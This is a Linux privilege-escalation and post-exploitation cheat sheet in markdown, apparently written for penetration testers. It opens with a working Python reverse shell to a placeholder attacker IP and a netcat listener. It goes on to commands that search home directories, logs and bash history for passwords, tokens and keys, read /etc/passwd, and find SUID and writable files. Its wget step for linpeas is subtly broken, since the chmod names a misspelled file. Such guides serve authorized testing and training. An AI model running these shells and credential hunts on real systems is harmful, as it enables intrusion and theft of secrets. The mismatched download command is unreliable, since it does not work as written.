Linux-Manual-Enumeration.md

Privilege Escalation & Post-Exploitation Enumeration For Linux

This document provides a comprehensive guide to privilege escalation and post-exploitation enumeration on Unix-like operating systems. It includes basic and advanced techniques to help identify and exploit potential vectors for escalating privileges. Some of them should be exploitable with the help of GTFOBins.

Table of Contents

1. Python Reverse Shell & Netcat Listener
2. Upgrading to a TTY Shell via Python
3. Basic Post-Exploitation Enumeration Commands
4. Advanced Privilege Escalation Techniques
5. Using Automated Tools for Enumeration

Python Reverse Shell & Netcat Listener

A reverse shell connects a compromised machine to an attacker's IP for remote command execution. A Netcat listener waits on a specified port to receive incoming connections.

Python TTY Reverse Shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.x.y",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);import pty;pty.spawn("/bin/bash")'

Netcat Listener:

nc -nvlp 4444

Upgrading to a TTY Shell

A TTY shell enhances the interactivity and functionality of a command-line interface. Follow these steps to achieve a fully functional TTY shell:

Step 1: Spawn a Better TTY Shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

Step 2: Set or Modify PATH Environment Variable

export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp

Step 3: Access Term Commands

export TERM=xterm-256color

Step 4: Background the Session: Use CTRL + Z to background the session.

Step 5: Turn Off Terminal Echo

stty raw -echo; fg; reset

Step 6: Set Terminal Size (Optional)

stty columns 200 rows 200

Basic Post-Exploitation Enumeration Commands

These commands help identify sensitive information and potential privilege escalation vectors:

1. Finding Secret Files

find /home/ -type f -exec ls -lsha {} + | grep -E -i '.secret|secret|token|key|api|password|username|db_password|mysql_password|mysql_user|databasepassword|mysql_root_password|mysql_password|credentials|creds|pass'

2. Finding SUID Files

find / -perm -4000 -type f 2>/dev/null

3. Finding SGID Files

find / -perm -2000 -type f 2>/dev/null

4. Finding Capabilities of Files

getcap -r / 2>/dev/null

5. Checking Permissions on /etc/passwd & /etc/shadow

ls -la /etc/passwd && ls -la /etc/shadow && cat /etc/passwd

6. Listing Scheduled Cron Jobs

cat /etc/crontab && ls -al /etc/cron.* && crontab -l && ls -al /var/spool/cron/crontabs

7. Searching for Passwords in Home Directory

cd /home && grep -rnH "password"

8. Checking Sudo Permissions

sudo -l

9. Reviewing Log Files

cat /var/log/* | grep -i 'password\|token\|key'

10. Listing Environment Variables

env

11. Accessing User's Bash History

cat .bash_history

12. Checking User and Host Information

whoami && id && hostname

13. Finding Writable Files

 find / -writable -type f 2>/dev/null

14. Finding Writable Directories:

find / -writable -type d 2>/dev/null

15. Finding Executables in PATH

echo $PATH | tr ':' '\n' | xargs -I {} find {} -type f -executable 2>/dev/null

Advanced Privilege Escalation Techniques

These techniques delve deeper into identifying and exploiting privilege escalation opportunities:

1. Network Configuration: netstat -tuln
2. Checking Installed Software for Debian-based systems: dpkg -l
3. Checking Installed Software for RPM-based systems: rpm -qa
4. Checking Kernel-Version: uname -r
5. Finding Writable Binaries: find / -perm -222 -type f 2>/dev/null
6. File Integrity and Monitoring: find / -type f -mtime -7 2>/dev/null

Using Automated Tools for Enumeration

wget https://linpeas.sh/ && chmod +x linepeas.sh

Specific Environment Checks

• For macOS: ls -la /private/var/log
• For Containers: docker inspect <container_id>

This guide is intended for educational and authorized security testing purposes only. Please always make sure you have explicit permission before conducting any security assessments.